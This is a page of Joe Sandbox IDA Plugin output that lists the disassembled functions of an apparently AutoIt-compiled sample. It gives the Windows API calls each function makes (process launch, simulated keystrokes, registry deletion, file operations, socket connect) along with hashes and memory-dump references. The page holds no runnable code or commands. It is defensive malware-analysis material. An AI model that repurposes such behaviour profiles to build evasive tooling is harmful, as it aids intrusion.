Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 2a87e75b8111d4cbd4052b361112d6cd71923e73de3e3e32c9467a32cadfce4d
Instruction ID: 9d16586557522b4c76ce05cdb2849b434e370735bad14a2d3c43c03c54fe353f
Opcode Fuzzy Hash: 2a87e75b8111d4cbd4052b361112d6cd71923e73de3e3e32c9467a32cadfce4d
Instruction Fuzzy Hash: 2471BB74604208EFDB259F64C894FBABBB9FF49300F148059EB55973A1CB3AAC50DB60

Function 007EFB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007EFB31
_memset.LIBCMT ref: 007EFBFA
ShellExecuteExW.SHELL32(?), ref: 007EFC3F

Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC

Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D

GetProcessId.KERNEL32(00000000), ref: 007EFCB6
CloseHandle.KERNEL32(00000000), ref: 007EFCE5

Strings

@, xrefs: 007EFC0E

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 97f78c33f7ec37ebeeccbef65fba5d16953e99ff7af73462bb508ca554a630e0
Instruction ID: 06a7e01cdaf60fb48e4c9b1daa0b1623f4e17500bf871d460aceeaacc64aa3bd
Opcode Fuzzy Hash: 97f78c33f7ec37ebeeccbef65fba5d16953e99ff7af73462bb508ca554a630e0
Instruction Fuzzy Hash: 0A61CF74A00619DFCF14EFA5C4949AEB7F4FF48310F208469E84AAB761DB38AD41CB90

Function 007D174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 007D178B
GetKeyboardState.USER32(?), ref: 007D17A0
SetKeyboardState.USER32(?), ref: 007D1801
PostMessageW.USER32(?,00000101,00000010,?), ref: 007D182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 007D184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 007D1894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 007D18B7

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 5b4598a9583a45f9e72876dd6cc976e97f4a6d0656ff9868b7d0675c16b1fdf7
Instruction ID: 10aeba9f3930c74aac90bc3280c5386607025231b06a7c17d7cc782e3d119de4
Opcode Fuzzy Hash: 5b4598a9583a45f9e72876dd6cc976e97f4a6d0656ff9868b7d0675c16b1fdf7
Instruction Fuzzy Hash: 4A51E6A0A087D53DFB368234CC55BBA7EF96B06310F4C858AE0D556AD2D29CECD4E750

Function 007D1565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 007D15A4
GetKeyboardState.USER32(?), ref: 007D15B9
SetKeyboardState.USER32(?), ref: 007D161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007D1646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007D1663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007D16A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007D16C8

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: ea1e52206ccfad14d78805792cf914220461a49275ddde805ebc18fe0435e1c5
Instruction ID: ed89db71611dc9ff5864626f7fbdb0926e2491b89b4d14172ccfdecd7455bd3d
Opcode Fuzzy Hash: ea1e52206ccfad14d78805792cf914220461a49275ddde805ebc18fe0435e1c5
Instruction Fuzzy Hash: 155117A06447D53DFB328724CC05BBA7EB96F46300F4C858AE0D546AC3DA9CEC98E750

Function 007D5BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 007D5BC5
_wcsncpy.LIBCMT ref: 007D5BFA
_wcsncpy.LIBCMT ref: 007D5C2C
_wcsncpy.LIBCMT ref: 007D5C5F
_wcsncpy.LIBCMT ref: 007D5CA1
_wcsncpy.LIBCMT ref: 007D5CDB
_wcsncpy.LIBCMT ref: 007D5D0A

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: c0f10438deca6fc2cd842b96706fc36df3dee9fe8f5192345bc501557834b886
Instruction ID: 47f579177196b83e7049db568dafdbd1fd097f7349d8ce4274e339b451a4b3c9
Opcode Fuzzy Hash: c0f10438deca6fc2cd842b96706fc36df3dee9fe8f5192345bc501557834b886
Instruction Fuzzy Hash: 71416076C20618B6CF11FBF4988E9CFB7B9AF04310F514856E519E3212E638A61687A6

Function 007D3B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007D3B8A,?), ref: 007D4BE0

Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007D3B8A,?), ref: 007D4BF9

lstrcmpiW.KERNEL32(?,?), ref: 007D3BAA
_wcscmp.LIBCMT ref: 007D3BC6
MoveFileW.KERNEL32(?,?), ref: 007D3BDE
_wcscat.LIBCMT ref: 007D3C26
SHFileOperationW.SHELL32(?), ref: 007D3C92

Strings

\*.*, xrefs: 007D3C20

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 45ce2c256bdf217e180bd449ef13a0d76a6f66f1aa95b53286838f8ec005afd6
Instruction ID: 32cd4d23965c6f7f43f5c8fc64d65fda2503a3fd7c25bc6f7453218954bde14d
Opcode Fuzzy Hash: 45ce2c256bdf217e180bd449ef13a0d76a6f66f1aa95b53286838f8ec005afd6
Instruction Fuzzy Hash: 454160B1508344AAC752EB64D485ADBB7FCAF88340F40092FF489D3251EB38D6488B56

Function 007F78B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007F78CF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F7976
IsMenu.USER32(?), ref: 007F798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F79D6
DrawMenuBar.USER32 ref: 007F79E9

Strings

0, xrefs: 007F78C3

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 9b84937e3bbfc74a6cf848616badf2131f83f449e2c2ea6a2a1a9e11f2d39089
Instruction ID: b5053c9088906a7f25f25ec42c712f945d437e04edf0b909306191ebc41a8573
Opcode Fuzzy Hash: 9b84937e3bbfc74a6cf848616badf2131f83f449e2c2ea6a2a1a9e11f2d39089
Instruction Fuzzy Hash: FF414871A08209EFDB24DF54D884EEABBB9FB05310F04812DEA55AB350C778AD50CFA0

Function 007F1602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007F1631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F165B
FreeLibrary.KERNEL32(00000000), ref: 007F1712

Part of subcall function 007F1602: RegCloseKey.ADVAPI32(?), ref: 007F1678
Part of subcall function 007F1602: FreeLibrary.KERNEL32(?), ref: 007F16CA
Part of subcall function 007F1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007F16ED

RegDeleteKeyW.ADVAPI32(?,?), ref: 007F16B5

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: a957959dad55fb92233fbfa8816d0eb8d6e2a7d7bdb6dff37159dfa72c4a8ea5
Instruction ID: f80912f82fda560e4262f456500c005c073323c414fb589e1f6a218901b70d8c
Opcode Fuzzy Hash: a957959dad55fb92233fbfa8816d0eb8d6e2a7d7bdb6dff37159dfa72c4a8ea5
Instruction Fuzzy Hash: DD311AB190110DFFDB14DB90DC89AFEB7BCEF08301F44016AEA05E2250EB789E459AA0

Function 007F68F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 007F6911
GetWindowLongW.USER32(01204CE8,000000F0), ref: 007F6944
GetWindowLongW.USER32(01204CE8,000000F0), ref: 007F6979
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 007F69AB
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 007F69D5
GetWindowLongW.USER32(?,000000F0), ref: 007F69E6
SetWindowLongW.USER32(?,000000F0,00000000), ref: 007F6A00

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 9905bcaec64f1fce7cc58126199bcd714da8eee1face9c337169e4fba4dffcba
Instruction ID: 9deec4809277f2135de60aca1951426b4d8a31f0bdbdcb2d803a14088e7b46fa
Opcode Fuzzy Hash: 9905bcaec64f1fce7cc58126199bcd714da8eee1face9c337169e4fba4dffcba
Instruction Fuzzy Hash: 98310270604258AFDB21CF28DC88F6537E1FB8A711F1901A8F6548B2A2CBB6BC40DB50

Function 007CE287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE2F0
SysAllocString.OLEAUT32(00000000), ref: 007CE2F3
SysAllocString.OLEAUT32(?), ref: 007CE311
SysFreeString.OLEAUT32(?), ref: 007CE31A
StringFromGUID2.OLE32(?,?,00000028), ref: 007CE33F
SysAllocString.OLEAUT32(?), ref: 007CE34D

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 96b8eb78d5f4a1eb2cffb7d45da923830b63fb8b2fca0bbc9829035c80ec4be9
Instruction ID: c64562b7536f5f5c4cf7d827267007630bb91ff98bdbbf829f2a3b34ba326a8f
Opcode Fuzzy Hash: 96b8eb78d5f4a1eb2cffb7d45da923830b63fb8b2fca0bbc9829035c80ec4be9
Instruction Fuzzy Hash: 9C21B732600609AFDF50DFA8DC88EBB77ACFB08360B04812DFA14DB250DA74AC418B64

Function 007E685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007E8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E84A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007E68B1
WSAGetLastError.WSOCK32(00000000), ref: 007E68C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007E68F9
connect.WSOCK32(00000000,?,00000010), ref: 007E6902
WSAGetLastError.WSOCK32 ref: 007E690C
closesocket.WSOCK32(00000000), ref: 007E6935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007E694E

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: eccfa0057928f9e524b4a57985c23b6d2c4dd77c46c2408e775e5c409a0718db
Instruction ID: c9a373265cc015c344d66141ce262eab8e07b09e3e52805e535c6f80c8c290e8
Opcode Fuzzy Hash: eccfa0057928f9e524b4a57985c23b6d2c4dd77c46c2408e775e5c409a0718db
Instruction Fuzzy Hash: 0131A471600208EFDB109F65CC89BB977A9EB58765F048029F909A7291DB78AC048BA1

Function 007CE360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007CE3CB
SysAllocString.OLEAUT32(00000000), ref: 007CE3CE
SysAllocString.OLEAUT32 ref: 007CE3EF
SysFreeString.OLEAUT32 ref: 007CE3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 007CE412
SysAllocString.OLEAUT32(?), ref: 007CE420

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: f03c8ed9d6ccd45aef01c3f86ac42a8d6cb33dedd5295b6067e35569a3684750
Instruction ID: 925619e9d7eeb667d46656aaa64e44d5341a38f975a7c7c1fb8bf50b29c5402e
Opcode Fuzzy Hash: f03c8ed9d6ccd45aef01c3f86ac42a8d6cb33dedd5295b6067e35569a3684750
Instruction Fuzzy Hash: C7219835604205AFEB549FB8DC88EAF77ECFB08360B00812DF915CB261DA78ED418B64

Function 007CFE19 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 007CFE2C
__wcsnicmp.LIBCMT ref: 007CFE4D
__wcsnicmp.LIBCMT ref: 007CFE67

Strings

#notrayicon, xrefs: 007CFE24
#requireadmin, xrefs: 007CFE47
#OnAutoItStartRegister, xrefs: 007CFE61

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 34c46556872b0baca8c176896df5070effb5267b8cc6fc4f694e511aa13cc0d5
Instruction ID: e978957311d0b3ebec17c846af6dd9f9f7ec56d89ef79ca4bf61562ef8e42d1a
Opcode Fuzzy Hash: 34c46556872b0baca8c176896df5070effb5267b8cc6fc4f694e511aa13cc0d5
Instruction Fuzzy Hash: 06214C32100111A6D730BA259C0AFB773DAEF51710F54443EF856871A3E7AD9D42C395

Function 007F7BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00772111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
Part of subcall function 00772111: GetStockObject.GDI32(00000011), ref: 00772163
Part of subcall function 00772111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007F7C57
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007F7C64
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007F7C6F
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007F7C7E
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007F7C8A

Strings

Msctls_Progress32, xrefs: 007F7C28

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: e635724a5d86c99fe2b7f11f05eb6c914c7eb72cb3b4f7117ddf52e5ebdb04f0
Instruction ID: 44100a3571fb5305afbf5c85835b3d90b318b4b21e46e9f19fce7edf4d7d9789
Opcode Fuzzy Hash: e635724a5d86c99fe2b7f11f05eb6c914c7eb72cb3b4f7117ddf52e5ebdb04f0
Instruction Fuzzy Hash: 9B1190B214021DBEEF158F60CC85EFB7F6EEF08798F014114BB08A2190DA769C21DBA0

Function 00799D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00799D16

Part of subcall function 007933B7: EncodePointer.KERNEL32(00000000), ref: 007933BA
Part of subcall function 007933B7: __initp_misc_winsig.LIBCMT ref: 007933D5
Part of subcall function 007933B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0079A0D0
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0079A0E4
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0079A0F7
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0079A10A
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0079A11D
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0079A130
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0079A143
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0079A156
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0079A169
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0079A17C
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0079A18F
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0079A1A2
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0079A1B5
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0079A1C8
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0079A1DB
Part of subcall function 007933B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0079A1EE

__mtinitlocks.LIBCMT ref: 00799D1B
__mtterm.LIBCMT ref: 00799D24

Part of subcall function 00799D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00799D29,00797EFD,0082CD38,00000014), ref: 00799E86
Part of subcall function 00799D8C: _free.LIBCMT ref: 00799E8D
Part of subcall function 00799D8C: DeleteCriticalSection.KERNEL32(00830C00,?,?,00799D29,00797EFD,0082CD38,00000014), ref: 00799EAF

__calloc_crt.LIBCMT ref: 00799D49
__initptd.LIBCMT ref: 00799D6B
GetCurrentThreadId.KERNEL32 ref: 00799D72

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: e8596d85880a8da1b9149f69f12c324cecc37d05af33477eddd079c160b7ec0c
Instruction ID: 1bdcfd27b23e4a25bb5f233eb979d4cc3c8caec7a3278781186c0917420578f0
Opcode Fuzzy Hash: e8596d85880a8da1b9149f69f12c324cecc37d05af33477eddd079c160b7ec0c
Instruction Fuzzy Hash: 55F0CD32A0A711AAFF347B3C7C4B38ABA94EF42730F20461DF6A0C50D2EF19880045A1

Function 007941B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00794282,?), ref: 007941D3
GetProcAddress.KERNEL32(00000000), ref: 007941DA
EncodePointer.KERNEL32(00000000), ref: 007941E6
DecodePointer.KERNEL32(00000001,00794282,?), ref: 00794203

Strings

RoInitialize, xrefs: 007941C2
combase.dll, xrefs: 007941CE

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

